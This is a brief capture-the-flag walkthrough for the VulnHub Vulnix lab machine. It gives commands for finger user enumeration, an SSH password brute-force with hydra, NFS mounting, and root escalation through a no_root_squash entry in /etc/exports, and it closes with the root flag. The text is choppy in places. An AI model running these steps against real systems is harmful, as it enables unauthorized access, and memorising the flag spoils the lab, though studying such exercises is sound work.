Machine: https://www.vulnhub.com/entry/hacklab-vulnix%2C48/
Now we can Download the 7z file and solve the machine by hosting it inside a virtual box.
perl finger-user-enum.pl -U /opt/metasploit-framework/embedded/framework/data/wordlists/unix_users.txt -t IP_ADRESS
we can get many usernames including user.letmein
. We can use command, hydra -l user -P /opt/wordlist/rockyou.txt 192.168.0.8 ssh -t 4
to bruteforce ssh with hydra./etc/passwd
as vulnix 2008.mount /home/vulnix
using nfs.ssh
to the machine, with ssh vulnix@192.168.0.8
.sudo -l
shows /etc/exports
is editable. So, added /root *(rw,sync,no_root_squash)
to root.trophy.txt
is cc614640424f5bd60ce5d5264899c3be
.Author: Zishan Ahamed Thandar